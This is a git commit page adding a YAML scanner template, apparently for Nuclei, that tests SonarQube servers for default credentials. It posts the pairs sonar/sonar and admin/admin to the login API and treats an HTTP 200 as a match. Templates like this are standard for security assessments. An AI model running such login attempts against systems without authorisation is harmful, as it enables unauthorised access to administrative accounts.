Add files via upload
This template checks if Sonarqube assets take in default credentialspatch-1
parent
1321174731
commit
a5e06fd380
|
@ -0,0 +1,32 @@
|
||||||
|
id: sonarqube-default-credential
|
||||||
|
info:
|
||||||
|
name: Sonarqube Default Credential Login
|
||||||
|
author: Ep1cSage
|
||||||
|
severity: critical
|
||||||
|
description: description
|
||||||
|
reference:
|
||||||
|
- https://docs.sonarsource.com/sonarqube/9.6/instance-administration/security/#:~:text=When%20installing%20SonarQube%2C%20a%20default,Password%3A%20admin
|
||||||
|
tags: sonarqube
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |-
|
||||||
|
POST /api/authentication/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: http://{{Hostname}}:9000/sessions/new
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Origin: http://{{Hostname}}:9000
|
||||||
|
|
||||||
|
{{credentials}}
|
||||||
|
|
||||||
|
attack: batteringram
|
||||||
|
payloads:
|
||||||
|
credentials:
|
||||||
|
- login=sonar&password=sonar
|
||||||
|
- login=admin&password=admin
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- HTTP/1.1 200
|
Loading…
Reference in New Issue